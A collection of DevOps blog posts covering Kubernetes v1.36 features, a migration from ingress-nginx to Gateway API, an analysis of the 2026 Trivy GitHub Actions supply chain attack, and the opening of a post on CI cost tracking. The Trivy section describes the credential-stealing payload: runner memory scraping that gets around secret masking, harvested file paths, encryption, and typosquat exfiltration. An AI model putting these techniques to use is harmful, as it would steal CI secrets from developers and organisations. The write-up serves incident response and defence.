This is alpha, so it's off by default. But if you're running Kueue or JobSet for batch AI workloads, this is worth enabling in a test cluster now.

Pod-Level Resource Managers (Alpha)

For HPC and AI/ML workloads, NUMA alignment matters. Previously, the Topology Manager only worked at the container level. If you had a training container plus logging and monitoring sidecars in the same pod, you couldn't guarantee they all landed on the same NUMA node.

v1.36 adds pod-scope resource management: you can now set pod.spec.resources and have the Topology Manager treat the entire pod as a single scheduling unit. All containers get resources from the same NUMA node.

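spec:
  # Pod-level budget shared by every container in the pod.
  # Requests equal limits so the pod lands in the Guaranteed QoS class.
  resources:
    requests:
      cpu: "16"
      memory: "64Gi"
    limits:
      cpu: "16"
      memory: "64Gi"
  # NUMA alignment is decided by the kubelet's Topology Manager policy on
  # the node, not by topologySpreadConstraints, which only spread pods
  # across node-level topology domains.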

DRA Resource Availability Visibility (Alpha)

Finally, a native way to answer "how many GPUs are free in this cluster?" without writing custom tooling.

kubectl create -f - <<EOF
apiVersion: resource.k8s.io/v1alpha1
kind: ResourcePoolStatusRequest
metadata:
  name: check-gpus
spec:
  driver: nvidia.com/gpu
EOF

kubectl get rpsr/check-gpus -o yaml
# Returns: totalDevices, allocatedDevices, availableDevices per node

This is alpha, but it's the kind of operational visibility that platform teams have been hacking around for years.

The Stability Improvements

SELinux Volume Labeling: Now GA

Faster pod startup on SELinux-enforcing systems. This replaces recursive file relabeling with a single mount-time label, which can cut pod startup time significantly on large volumes. It's been in beta since v1.28 and is now stable and on by default.

If you're running RHEL or any SELinux-enforcing OS, you'll notice this immediately.

External ServiceAccount Token Signing: GA

The kube-apiserver can now delegate token signing to external KMS or HSM systems. For clusters with strict key management requirements (financial services, healthcare, government), this removes a significant compliance gap.

Graceful Leader Transition (Alpha)

Control plane components (kube-controller-manager, kube-scheduler) used to call os.Exit() when losing leader election, forcing a full restart. v1.36 introduces graceful transitions: the component moves to follower state and re-enters the election without restarting. Faster failover, less noise in your control plane logs.

Stale Controller Mitigation (Alpha)

Large clusters with high churn have always had a subtle bug: a controller creates a resource, its cache hasn't updated yet, and it tries to create the same resource again. v1.36 adds cache freshness tracking so controllers check whether their local state is current before reconciling. Fewer duplicate creates, fewer spurious errors in busy clusters.

HPA Scale-to-Zero (Alpha)

The Horizontal Pod Autoscaler can now scale deployments to zero replicas based on external metrics (queue depth, custom metrics). When the queue is empty, the deployment goes to zero. When work arrives, it scales back up. This is the missing piece for event-driven workloads that don't need to run 24/7.

What to Do Before April 22

Audit gitRepo volumes. Run kubectl get pods -A -o json | jq '.items[].spec.volumes[]? | select(.gitRepo != null)'. If you get output, you have work to do.
Plan your ingress-nginx migration. Check kubectl get ingressclass and kubectl get pods -A | grep ingress-nginx. If you're running it, pick a replacement and start testing.
Check for externalIPs usage. kubectl get svc -A -o json | jq '.items[] | select(.spec.externalIPs != null) | .metadata.name'
Test DRA partitionable devices in staging. If you run GPU workloads, exercise them there first: the feature is beta, so it is on by default once you upgrade.
Read the full changelog. The CHANGELOG-1.36.md is dense but worth scanning for anything specific to your stack.
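If you would rather keep the audit in a script than in jq one-liners, the first and third checks above can be sketched in Python. This assumes you have saved the output of kubectl get pods -A -o json and kubectl get svc -A -o json and parsed it into dictionaries; the function names are illustrative.

```python
def pods_with_gitrepo(pod_list):
    """Return 'namespace/pod:volume' for every volume still using gitRepo."""
    hits = []
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata", {})
        for volume in pod.get("spec", {}).get("volumes") or []:
            if volume.get("gitRepo") is not None:
                hits.append(f"{meta.get('namespace')}/{meta.get('name')}:{volume.get('name')}")
    return hits


def services_with_external_ips(svc_list):
    """Return 'namespace/service' for every Service that sets spec.externalIPs."""
    hits = []
    for svc in svc_list.get("items", []):
        if svc.get("spec", {}).get("externalIPs"):
            meta = svc.get("metadata", {})
            hits.append(f"{meta.get('namespace')}/{meta.get('name')}")
    return hits


# Tiny hand-written fixtures standing in for real kubectl output.
pods = {"items": [
    {"metadata": {"namespace": "web", "name": "site"},
     "spec": {"volumes": [{"name": "code", "gitRepo": {"repository": "https://github.com/example/repo"}}]}},
    {"metadata": {"namespace": "web", "name": "api"}, "spec": {"volumes": [{"name": "tmp", "emptyDir": {}}]}},
]}
svcs = {"items": [
    {"metadata": {"namespace": "edge", "name": "legacy"}, "spec": {"externalIPs": ["203.0.113.10"]}},
    {"metadata": {"namespace": "edge", "name": "modern"}, "spec": {"type": "LoadBalancer"}},
]}
gitrepo_hits = pods_with_gitrepo(pods)
external_ip_hits = services_with_external_ips(svcs)
```

This only inspects running pods. Deployments, StatefulSets, and Helm charts that template a gitRepo volume need the same check against their pod templates.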

The Bigger Picture

v1.36 isn't a flashy release. There's no single feature that rewrites how Kubernetes works. What it is, is a release that takes the AI/ML workload story seriously at the scheduler and resource allocation level, while cleaning up years of accumulated security debt.

The gitRepo removal and ingress-nginx retirement are overdue. The DRA work is genuinely new capability. And the gang scheduling improvements are the kind of thing that makes distributed training jobs actually reliable on Kubernetes instead of just theoretically possible.

If you're running AI inference at scale, v1.36 is the release you've been waiting for. If you're running anything else, it's a solid maintenance release with a few security items you can't ignore.

ingress-nginx Is Dead: How I Migrated to Gateway API Before It Became a Liability

Mateen Anjum — Tue, 07 Apr 2026 18:15:05 +0000

ingress-nginx was archived on March 24, 2026 after a string of critical CVEs including a 9.8 CVSS unauthenticated RCE. Gateway API v1.4 is the Kubernetes project's own successor to Ingress. I used ingress2gateway 1.0 to convert 40+ Ingress resources to HTTPRoutes, validated the output, and cut over with zero downtime. Here's exactly how I did it.

Why This Happened

In March 2025, CVE-2025-1974 (dubbed "IngressNightmare") dropped: a CVSS 9.8 unauthenticated remote code execution vulnerability in ingress-nginx's admission webhook. Any attacker with network access to the webhook could execute arbitrary code inside the controller pod, which typically has broad cluster permissions. That was bad enough on its own.

Then came 2026. Four more CVEs, all rated HIGH, landed in quick succession:

CVE	Severity	What It Does
CVE-2025-1974	CRITICAL 9.8	Unauthenticated RCE via admission webhook
CVE-2026-1580	HIGH	Config injection leading to privilege escalation
CVE-2026-24512	HIGH	Path injection through nginx config manipulation
CVE-2026-24513	HIGH	Authentication bypass
CVE-2026-24514	HIGH	Annotation abuse for unauthorized access

On March 24, 2026, the ingress-nginx repository was officially archived. Read-only. No more patches. No more CVE fixes. If you're still running it, you're running unpatched software with known critical vulnerabilities.

This wasn't a surprise deprecation. The Kubernetes community had been building Gateway API for years as the successor to the Ingress resource. But the CVE storm turned "migrate when convenient" into "migrate now."

Gateway API: What Actually Changed

Gateway API isn't just "Ingress v2." It fundamentally changes how traffic routing is modeled in Kubernetes by splitting responsibilities across three layers:

Layer 1: GatewayClass (Infrastructure Admin)

The infrastructure team defines what gateway implementation is available. Think of it as the "which load balancer technology" decision.

apiVersion: gateway.networking.k8s.io/v1
kind: GatewayClass
metadata:
  name: production-gateway
spec:
  controllerName: gateway.envoyproxy.io/gatewayclass-controller

Layer 2: Gateway (Cluster Operator)

The platform team creates Gateway resources that bind to a GatewayClass. This is where you define listeners, ports, TLS certificates, and which namespaces can attach routes.

apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: main-gateway
  namespace: gateway-infra
spec:
  gatewayClassName: production-gateway
  listeners:
    - name: https
      protocol: HTTPS
      port: 443
      tls:
        mode: Terminate
        certificateRefs:
          - name: wildcard-tls
      allowedRoutes:
        namespaces:
          from: Selector
          selector:
            matchLabels:
              gateway-access: "true"
    - name: http
      protocol: HTTP
      port: 80

Layer 3: HTTPRoute (Application Developer)

Application teams define their own routing rules without touching the gateway configuration. They just reference the Gateway they want to attach to.

apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: my-api
  namespace: my-api
spec:
  parentRefs:
    - name: main-gateway
      namespace: gateway-infra
  hostnames:
    - "api.example.com"
  rules:
    - matches:
        - path:
            type: PathPrefix
            value: /v1
      backendRefs:
        - name: api-service
          port: 8080

This separation matters because it maps to how teams actually operate. Infrastructure admins pick the implementation. Platform engineers configure the gateway. App developers define their routes. Nobody steps on each other's toes, and RBAC enforces the boundaries.
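
The namespace gate on the https listener is a plain label match. A rough Python sketch of that check, assuming only matchLabels is used (real label selectors also support matchExpressions, which this ignores); the function name is illustrative.

```python
def namespace_may_attach(namespace_labels: dict[str, str],
                         match_labels: dict[str, str]) -> bool:
    """True when every matchLabels pair is present on the namespace."""
    return all(namespace_labels.get(k) == v for k, v in match_labels.items())


# Selector copied from the Gateway's https listener above.
selector = {"gateway-access": "true"}

if __name__ == "__main__":
    print(namespace_may_attach({"gateway-access": "true", "team": "api"}, selector))
    print(namespace_may_attach({"team": "batch"}, selector))
```

In practice that means an app team's HTTPRoute only binds to the https listener once someone with rights over the namespace has added the gateway-access: "true" label to it.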

Why This Is Better Than Annotations

With ingress-nginx, everything was shoved into annotations. Rate limiting, CORS, timeouts, rewrites, all of it crammed into nginx.ingress.kubernetes.io/* strings that were:

Non-standard: Every controller had its own annotation format
Unvalidated: Typo an annotation name? Silent failure
Unstructured: Complex configs as string values
Non-portable: Locked to one implementation

Gateway API uses typed CRD fields. Your IDE autocompletes them. The API server validates them. They work across implementations.

The Migration: Using ingress2gateway 1.0

On March 20, 2026, ingress2gateway 1.0 shipped with support for 30+ ingress-nginx annotations. This was the tool that made bulk migration practical.

Step 1: Install

brew install ingress2gateway
# or
go install github.com/kubernetes-sigs/ingress2gateway@v1.0.0

Step 2: Scan and Convert

# Convert everything cluster-wide
ingress2gateway print --providers=ingress-nginx --all-namespaces > gwapi.yaml

# Or target a specific namespace
ingress2gateway print --namespace my-api --providers=ingress-nginx > gwapi.yaml

# If you've chosen your implementation, use emitter flags
ingress2gateway print --emitter envoy-gateway --providers=ingress-nginx --all-namespaces > gwapi.yaml

Step 3: Review the Output

Here's what a typical translation looks like.

Before (Ingress with ingress-nginx annotations):

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: my-api
  annotations:
    nginx.ingress.kubernetes.io/cors-allow-origin: "https://app.example.com"
    nginx.ingress.kubernetes.io/cors-allow-methods: "GET, POST, OPTIONS"
    nginx.ingress.kubernetes.io/enable-cors: "true"
    nginx.ingress.kubernetes.io/proxy-read-timeout: "60"
    nginx.ingress.kubernetes.io/use-regex: "true"
spec:
  ingressClassName: nginx
  tls:
    - hosts:
        - api.example.com
      secretName: api-tls
  rules:
    - host: api.example.com
      http:
        paths:
          - path: /api/v[0-9]+/users
            pathType: ImplementationSpecific
            backend:
              service:
                name: users-service
                port:
                  number: 8080

After (Gateway API HTTPRoute):

apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: my-api
spec:
  parentRefs:
    - name: main-gateway
      namespace: gateway-infra
  hostnames:
    - "api.example.com"
  rules:
    - matches:
        - path:
            type: RegularExpression
            value: "/api/v[0-9]+/users"
      filters:
        - type: ResponseHeaderModifier
          responseHeaderModifier:
            set:
              - name: Access-Control-Allow-Origin
                value: "https://app.example.com"
              - name: Access-Control-Allow-Methods
                value: "GET, POST, OPTIONS"
      timeouts:
        backendRequest: 60s
      backendRefs:
        - name: users-service
          port: 8080

The structure is cleaner. CORS headers are explicit. The regex path type is a first-class field instead of being toggled by an annotation. Timeouts are typed durations, not string-encoded integers.

What ingress2gateway Cannot Translate

The tool is good, but it's not magic. Watch for these:

Custom Lua snippets. If you used nginx.ingress.kubernetes.io/server-snippet or configuration-snippet with custom Lua or raw nginx config, those have no Gateway API equivalent. You'll need to reimplement that logic in your application or use implementation-specific policies.

Rate limiting. ingress-nginx rate limiting annotations don't map to standard Gateway API fields. Most implementations offer their own rate limiting CRDs (like Envoy Gateway's BackendTrafficPolicy).

ModSecurity / WAF rules. If you had ModSecurity enabled via annotations, you'll need a separate WAF solution or an implementation that supports it natively.

Session affinity. Cookie-based session affinity annotations need implementation-specific configuration in Gateway API.

Custom error pages. These were nginx-specific and need to be handled at the application level or through implementation extensions.

ingress2gateway will print warnings for annotations it can't convert. Read every warning. I found three services silently losing rate limiting configs that would have caused issues in production.
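
Before running the converter, it helps to know which Ingresses carry annotations from the categories above. The sketch below is not part of ingress2gateway; it assumes the JSON from kubectl get ingress -A -o json and a hand-picked set of ingress-nginx annotation names that you should extend for your own cluster.

```python
PREFIX = "nginx.ingress.kubernetes.io/"

# Annotation suffixes from the categories listed above (not exhaustive).
NEEDS_MANUAL_WORK = {
    "server-snippet": "custom snippet",
    "configuration-snippet": "custom snippet",
    "limit-rps": "rate limiting",
    "limit-rpm": "rate limiting",
    "enable-modsecurity": "ModSecurity / WAF",
    "affinity": "session affinity",
    "custom-http-errors": "custom error pages",
}


def flag_annotations(ingress_list: dict) -> list[tuple[str, str, str]]:
    """Return (namespace/name, annotation, category) for each flagged annotation."""
    findings = []
    for ing in ingress_list.get("items", []):
        meta = ing.get("metadata", {})
        ref = f"{meta.get('namespace')}/{meta.get('name')}"
        for key in sorted(meta.get("annotations") or {}):
            if not key.startswith(PREFIX):
                continue
            suffix = key[len(PREFIX):]
            if suffix in NEEDS_MANUAL_WORK:
                findings.append((ref, key, NEEDS_MANUAL_WORK[suffix]))
    return findings
```

Cross-check the result against the converter's warnings; anything that shows up here but not in a warning deserves a closer look.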

Choosing a Gateway API Implementation

Gateway API is a spec. You need an implementation. Here's how I evaluated the main options:

Implementation	Backed By	Best For	Notes
Envoy Gateway	Envoy Proxy / CNCF	General purpose, feature-rich	Strong community, good docs
kgateway	Solo.io	Advanced traffic management	Commercial support available
Cilium Gateway	Isovalent/Cisco	eBPF-native networking	Great if you already run Cilium CNI
NGINX Gateway Fabric	F5/NGINX	Familiar nginx users	Uses nginx under the hood
Istio Waypoint	Google/Solo.io	Service mesh integration	If you're already on Istio

I went with Envoy Gateway. It's CNCF-backed, has broad feature coverage, and doesn't require buying into a service mesh. The --emitter envoy-gateway flag in ingress2gateway generates implementation-specific extensions where needed, which saved manual work.

My Migration Checklist

Here's the checklist I followed. Steal it.

Pre-migration:
[ ] Inventory all Ingress resources: kubectl get ingress --all-namespaces
[ ] Document custom annotations per Ingress
[ ] Identify any custom nginx configs (ConfigMap, snippets)
[ ] Install Gateway API CRDs: kubectl apply -f https://github.com/kubernetes-sigs/gateway-api/releases/download/v1.4.0/standard-install.yaml
[ ] Deploy chosen Gateway API implementation

Conversion:
[ ] Run ingress2gateway print and capture output
[ ] Review ALL warnings from ingress2gateway
[ ] Manually handle untranslatable annotations
[ ] Create GatewayClass and Gateway resources
[ ] Create ReferenceGrant resources for cross-namespace refs

Validation:
[ ] Apply HTTPRoutes to staging cluster
[ ] Test every endpoint (automated: curl + expected status codes)
[ ] Verify TLS termination works
[ ] Check CORS headers in browser dev tools
[ ] Validate regex paths match correctly
[ ] Load test to confirm no performance regression
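
The "test every endpoint" item is worth automating. A minimal sketch using only the Python standard library follows; the URL-to-status mapping is something you would write yourself, and the function names are illustrative. Note that urllib follows redirects, so this version can't assert on a 301 or 302.

```python
import urllib.error
import urllib.request
from typing import Callable


def http_status(url: str, timeout: float = 5.0) -> int:
    """Fetch a URL and return the final HTTP status code."""
    req = urllib.request.Request(url, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        # 4xx and 5xx responses raise, but still carry the status we want.
        return err.code


def check_endpoints(expected: dict[str, int],
                    fetch: Callable[[str], int] = http_status) -> list[str]:
    """Compare each URL's status with the expected one and list mismatches."""
    failures = []
    for url, want in expected.items():
        got = fetch(url)
        if got != want:
            failures.append(f"{url}: expected {want}, got {got}")
    return failures
```

Run it once against the old Ingress path and once against the new Gateway address; the two failure lists should both be empty before cutover.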

Cutover:
[ ] Update DNS or switch load balancer target
[ ] Monitor error rates for 30 minutes
[ ] Keep old Ingress resources (don't delete yet)
[ ] After 48 hours stable: remove old Ingress resources
[ ] Uninstall ingress-nginx controller

Results

After migrating 40+ Ingress resources across 12 namespaces:

Metric	Before	After
Known CVEs	5 (1 critical)	0
Annotation sprawl	180+ annotations	0 (typed fields)
Cross-namespace routing	Manual workarounds	Native ReferenceGrant
Downtime during migration	N/A	Zero
Time to complete	N/A	3 days (including validation)

Lessons Learned

Don't wait for the archive notice. Gateway API has been stable since v1.0 (October 2023). I should have started earlier. The CVE pressure made this more stressful than it needed to be.

ingress2gateway is a starting point, not a finish line. It handled about 85% of our config automatically. The remaining 15% required understanding both the old nginx annotations and the new Gateway API model.

The three-layer model pays off immediately. Within a week of the migration, our app teams were creating their own HTTPRoutes without filing tickets to the platform team. That alone justified the effort.

Test regex paths carefully. The regex syntax between nginx and Gateway API implementations can differ subtly. I caught two path patterns that matched differently under Envoy than they did under nginx.
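
One way that kind of mismatch can arise, sketched in Python. The assumption here is that the nginx side matches case-insensitively from the start of the path and allows anything after the pattern, while the new implementation requires the whole path to match; check your own implementation's documentation before relying on either behaviour.

```python
import re

PATTERN = r"/api/v[0-9]+/users"


def nginx_style(path: str) -> bool:
    # Assumption: anchored at the start only, case-insensitive.
    return re.match(PATTERN, path, re.IGNORECASE) is not None


def full_match_style(path: str) -> bool:
    # Assumption: the entire path must match, case-sensitively.
    return re.fullmatch(PATTERN, path) is not None


if __name__ == "__main__":
    for path in ("/api/v2/users", "/api/v2/users/42", "/API/v2/users"):
        print(path, nginx_style(path), full_match_style(path))
```

Under those assumptions, appending (/.*)? to the pattern restores the old trailing-path behaviour; a table of real request paths run through both functions makes a cheap regression test.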

Keep the old Ingress resources around. Don't delete them the moment Gateway API routes are working. Give yourself a rollback window. I kept ours for 48 hours before cleanup.

Your Security Scanner Was the Weapon: Inside the Trivy Supply Chain Attack

Mateen Anjum — Sat, 28 Mar 2026 17:40:45 +0000

TL;DR: Trivy, the most widely used container scanning action in GitHub Actions, was compromised on March 19, 2026. A threat actor poisoned 76 of its 77 version tags. Every pipeline that ran a scan silently handed over SSH keys, cloud credentials, Kubernetes tokens, and more. The scan appeared to succeed. You'd never know.

The Setup

I've had Trivy in my pipelines for years. Container scanning on every PR, every merge, every deploy. It's one of those things you set up once and stop thinking about, which is exactly what makes this attack so effective.

On March 19, 2026, a threat actor group called TeamPCP force-pushed malicious commits to 76 of the 77 version tags in the aquasecurity/trivy-action GitHub repository. All 7 tags in aquasecurity/setup-trivy were also compromised. If your workflow referenced Trivy by a tag (which is how basically everyone references GitHub Actions), you were running their code.

The scanner still ran. Your pipeline still went green. You had no idea.

How It Actually Happened

This attack didn't start on March 19. It started weeks earlier.

Late February 2026: An automated bot called "hackerbot-claw" exploited a misconfigured GitHub Actions workflow and stole a privileged Personal Access Token from Aqua Security's CI environment. The attacker used this to push malware to the Trivy VS Code extension on Open VSX.

March 1: Aqua Security disclosed the incident publicly via a GitHub discussion and rotated credentials. Except the rotation was incomplete. One service account, one PAT, one residual access path, still live.

March 19, 17:43 UTC: Using the still-valid credentials, TeamPCP force-pushed malicious commits to 76 of 77 tags in trivy-action and all 7 tags in setup-trivy. The compromised commits spoofed legitimate maintainer identities. GitHub itself flagged them with "This commit does not belong to any branch on this repository", but that banner appears on the commit page in the web UI, not in a workflow log, so it's easy to miss.

March 19, 18:22 UTC: A rogue commit published a malicious Trivy binary as v0.69.4 across every distribution channel simultaneously: GitHub Releases, GHCR, Docker Hub, ECR Public, deb/rpm repositories, and get.trivy.dev.

March 20, 05:40 UTC: Aqua remediated the trivy-action tags. The window was roughly 12 hours.

March 22: The attacker pushed additional malicious Docker Hub images (v0.69.5, v0.69.6, latest) using separately compromised Docker Hub credentials, bypassing all GitHub controls. Same day, 44 repositories in Aqua's aquasec-com GitHub org were defaced using a stolen service account token that bridged both orgs.

March 24: The campaign expanded to Checkmarx KICS and LiteLLM PyPI packages (1.82.7, 1.82.8).

The takeaway here is not just that a tool got compromised. It's that incomplete remediation turned a single breach into a three-week campaign.

What the Payload Did

This is the part that should make you uncomfortable.

The malicious entrypoint.sh prepended about 105 lines of attack code before the legitimate Trivy scanner logic. The scan completed normally. Your logs looked fine.

Stage 1: Process enumeration. The script scanned /proc/*/environ across all runner processes, extracting environment-level secrets, filtering for anything with env or ssh in the name.

Stage 2: Memory scraping. Here's where it gets clever. On GitHub-hosted runners, a base64-encoded Python script located the Runner.Worker process, read its memory maps via /proc/{PID}/maps, and scraped raw process memory via /proc/{PID}/mem. It was targeting GitHub Actions secrets specifically, looking for JSON structures matching "name":{"value":"...","isSecret":true}.

This matters because it bypassed GitHub Actions' secret masking. Values that would show as *** in your logs were extracted in plaintext from process memory. There's no log artifact. Nothing looked wrong.

On self-hosted runners, a different payload did broad filesystem harvesting across 50+ target paths:

SSH private keys and configs
Cloud credentials (AWS, GCP, Azure)
Kubernetes configs and service account tokens
Docker registry credentials
Database credentials (MySQL, PostgreSQL, MongoDB, Redis)
Terraform state files and variables
Ansible vaults and Helm values
.env files and API keys
Git credentials and shell history
Cryptocurrency wallet keys

Stage 3: Encryption. Collected data was encrypted with AES-256-CBC using a randomly generated session key, then the session key was wrapped with a hardcoded 4096-bit RSA public key. Only whoever holds the matching private key, meaning the attacker, could decrypt it.

Stage 4: Exfiltration. The primary channel was an HTTPS POST to scan.aquasecurtiy[.]org, a typosquatted domain designed to look like Aqua Security's legitimate domain (note the transposed 't' and 'i' in 'security'). It resolved to 45.148.10.212 in Amsterdam.

Fallback: if the C2 was unreachable and a GitHub PAT was in the environment, the malware created a public repository named tpcp-docs and uploaded stolen data as release assets, turning GitHub itself into the exfiltration channel.

Are You Affected?

Check these specific exposure windows:

Component	Affected Versions	Exposure Window	Safe
trivy binary	v0.69.4	~3h (Mar 19)	v0.69.3 or earlier
trivy Docker Hub	v0.69.5, v0.69.6, latest	~10h (Mar 22–24)	v0.69.3 or earlier
trivy-action	Tags 0.0.1–0.34.2	~12h (Mar 19–20)	v0.35.0+ or SHA-pinned
setup-trivy	All 7 tags	~12h (Mar 19–20)	SHA-pinned
LiteLLM PyPI	1.82.7, 1.82.8	Mar 24+	1.82.6 or earlier

If you ran Trivy in any pipeline during those windows and weren't pinning to a commit SHA, you have to assume secrets were stolen. All of them. Every secret accessible from that runner environment.
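
To triage a list of workflow runs quickly, you can test each start time against the trivy-action window. This sketch uses the 17:43 UTC and 05:40 UTC timestamps from the timeline above; the function name is illustrative, and timestamps without a timezone are assumed to be UTC.

```python
from datetime import datetime, timezone

# trivy-action exposure window, taken from the timeline above (UTC).
WINDOW_START = datetime(2026, 3, 19, 17, 43, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 3, 20, 5, 40, tzinfo=timezone.utc)


def ran_in_window(started_at: str) -> bool:
    """started_at is an ISO 8601 timestamp such as '2026-03-19T18:05:00Z'."""
    ts = datetime.fromisoformat(started_at.replace("Z", "+00:00"))
    if ts.tzinfo is None:
        # Assumption: naive timestamps are UTC.
        ts = ts.replace(tzinfo=timezone.utc)
    return WINDOW_START <= ts <= WINDOW_END
```

Treat the window edges generously. A run that started just before 17:43 could still have pulled the action after the tags were poisoned.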

What You Need to Change

This is the remediation checklist, ordered by priority.

1. Rotate first, investigate second

If you were in the exposure window, rotate everything the runner could have touched. Don't wait for confirmation. Treat every secret as compromised:

AWS access keys and IAM roles
GCP service account keys
Azure service principals
Kubernetes service account tokens
Docker registry credentials
SSH keys
Database credentials
GitHub PATs and tokens

2. Pin actions to commit SHAs

This is the single most effective structural change. Tags are mutable. Commit SHAs are not.

# Bad: a mutable tag, which is what everyone does and what got compromised
- uses: aquasecurity/trivy-action@0.24.0

# Good: pinned to the full 40-character commit SHA of a release you have verified
- uses: aquasecurity/trivy-action@<full-40-character-commit-sha>  # 0.35.0

Yes, it's more work to update. That's the point. Renovate or Dependabot can automate SHA updates if you configure them for Actions.
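
Finding the unpinned references is easy to script. Here is a minimal sketch that scans workflow text with a regular expression rather than a YAML parser, so it stays dependency-free; it skips local actions and docker:// references, and the function name is illustrative.

```python
import re

# Matches `uses: owner/repo@ref`, with or without a leading list dash.
USES = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.MULTILINE)
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_text: str) -> list[str]:
    """Return every `uses:` reference that is not pinned to a 40-hex commit SHA."""
    unpinned = []
    for ref in USES.findall(workflow_text):
        if ref.startswith("./") or ref.startswith("docker://"):
            continue  # local actions and container images are out of scope here
        _, _, version = ref.partition("@")
        if not FULL_SHA.match(version):
            unpinned.append(ref)
    return unpinned
```

Run it over every file in .github/workflows and fail the build when the list is non-empty.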

3. Switch to OIDC for cloud authentication

Long-lived cloud credentials in CI are a liability. OIDC lets your runner authenticate to AWS, GCP, or Azure without storing static keys:

# AWS example
# The job also needs `permissions: id-token: write` so the runner can request an OIDC token
- uses: aws-actions/configure-aws-credentials@v4
  with:
    role-to-assume: arn:aws:iam::ACCOUNT:role/github-actions-role
    aws-region: us-east-1

With OIDC there is no long-lived key sitting in your secrets store to steal. The credentials are short-lived and scoped to the job, so anything scraped from a runner expires on its own.

4. Restrict runner permissions

Every workflow run gets a GITHUB_TOKEN by default. Scope it down with a permissions block at the workflow or job level:

permissions:
  contents: read
  security-events: write
  # Nothing else

Most workflows need far less than the default. Less permission means smaller blast radius.

5. Audit non-human identities

The Trivy attack persisted because one service account credential wasn't rotated. Audit all machine identities in your org:

GitHub PATs: Who issued them? When do they expire? Are they scoped minimally?
Service accounts: Which ones have write access to release infrastructure?
Bot accounts: Are any shared across orgs or repositories?

Long-lived, over-privileged service accounts are how a one-time breach becomes a three-week campaign.

6. Use secret scanning

GitGuardian, GitHub's native secret scanning, or both. The Trivy attacker used GitHub as a fallback exfiltration channel. If your credentials ever end up in a public repo, you want to know in minutes, not days.

7. Verify binaries before running them

For direct binary downloads (not GitHub Actions), verify checksums:

# Download the official checksums
curl -sSL https://github.com/aquasecurity/trivy/releases/download/v0.69.3/trivy_0.69.3_checksums.txt -o checksums.txt

# Verify your binary
sha256sum -c checksums.txt --ignore-missing

If your pipeline downloads and runs binaries from the internet, add checksum verification as a step.
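
The same check can live inside a Python build step. This is a minimal sketch, assuming a sha256sum-style checksums file with one "digest  filename" pair per line; the function names are illustrative.

```python
import hashlib
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream the file through SHA-256 so large binaries don't load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify(binary: Path, checksums: Path) -> bool:
    """Look up binary.name in the checksums file and compare digests."""
    for line in checksums.read_text().splitlines():
        parts = line.split()
        if len(parts) == 2 and parts[1].lstrip("*") == binary.name:
            return parts[0].lower() == sha256_of(binary)
    raise LookupError(f"{binary.name} not listed in {checksums}")
```

A missing entry raises instead of returning False, so a renamed download can't slip through as "not checked".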

The Real Lesson

The Trivy attack was technically sophisticated, but the root cause is unglamorous: incomplete credential rotation.

Aqua disclosed the initial breach on March 1 and rotated credentials. One PAT, one service account, one residual access path was left active. That's what TeamPCP used on March 19. The March 22 Docker Hub compromise used yet another separate credential that wasn't in scope of the original remediation.

When you rotate secrets after a breach, you need to be exhaustive. Enumerate every credential that could have been exposed, every service account that had access, every integration that used a compromised token. Rotation is not a task you do until it feels complete. It's a task you do until you've verified every access path is severed.

The other lesson: the attack surface for CI/CD is enormous. Your pipeline runs with access to secrets, cloud credentials, internal infrastructure. When you add a third-party action, you're trusting that maintainer's entire security posture, including their CI, their service accounts, and their credential management practices. SHA pinning doesn't eliminate that trust but it gives you a stable, auditable point you can reason about.

Immediate Checklist

[ ] Check pipeline logs for trivy-action usage between March 19–20
[ ] Check pipeline logs for trivy binary v0.69.4 usage on March 19
[ ] Check for Docker image usage of v0.69.5, v0.69.6, or latest between Mar 22–24
[ ] Rotate all secrets accessible from affected runners
[ ] Update trivy-action to v0.35.0 or pin to SHA
[ ] Check for LiteLLM usage of 1.82.7 or 1.82.8
[ ] Switch cloud auth to OIDC
[ ] Pin all third-party actions to commit SHAs
[ ] Restrict workflow permissions to minimum required
[ ] Audit service accounts and PATs for expiry and scope
[ ] Enable secret scanning on your org

GitHub Actions costs are leaking, and most teams don't notice until it's too late

Mateen Anjum — Mon, 16 Mar 2026 05:24:12 +0000

Two years ago I was working on a connected vehicles platform running 40+ microservices on Kubernetes. CI was healthy, tests were passing, and nobody was paying attention to the GitHub Actions bill until it hit $4,200 in a single month.

The culprit was a matrix build that someone had extended to cover six Node versions. Nobody noticed because the cost didn't show up anywhere obvious. It wasn't flagged in any alert. The engineers who added the matrix jobs weren't thinking about cost. By the time finance asked the question, the pattern had been running for three months.

I started looking for a tool that could give us per-workflow cost visibility. Something that would let us answer "which workflows cost the most" and "did this PR make CI more expensive." I didn't find anything that fit, so I built CICosts.

What it does

CICosts installs as a GitHub App and receives a webhook event every time a workflow run completes. It multiplies the runner minutes by GitHub's published pricing for that runner type (Linux, Windows, macOS, self-hosted) and stores the result.

From there you get a dashboard showing cost by workflow, by repository, by branch, and over time. You can set alerts when a workflow exceeds a threshold. You can see trends, spot regressions after PRs merge, and compare costs across environments.

The math is straightforward. GitHub charges $0.008/minute for Linux runners, $0.016 for Windows, $0.08 for macOS. If a workflow runs for 12 minutes on Linux, that's $0.096. Not much in isolation. Run it 500 times a day across 30 repositories and it adds up fast.
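
Here is that arithmetic as a small Python sketch. The rates are the per-minute prices quoted above; the function names are illustrative and this is not CICosts' actual code. It reads "500 times a day" as 500 runs in total across all repositories.

```python
from decimal import Decimal

# Per-minute rates quoted above, in USD.
RATE_PER_MINUTE = {
    "linux": Decimal("0.008"),
    "windows": Decimal("0.016"),
    "macos": Decimal("0.08"),
}


def run_cost(minutes: int, runner: str) -> Decimal:
    """Cost of a single workflow run on the given runner type."""
    return RATE_PER_MINUTE[runner] * minutes


def monthly_cost(minutes: int, runner: str, runs_per_day: int,
                 days: int = 30) -> Decimal:
    """Cost of repeating the same run every day for a month."""
    return run_cost(minutes, runner) * runs_per_day * days


if __name__ == "__main__":
    print(run_cost(12, "linux"))
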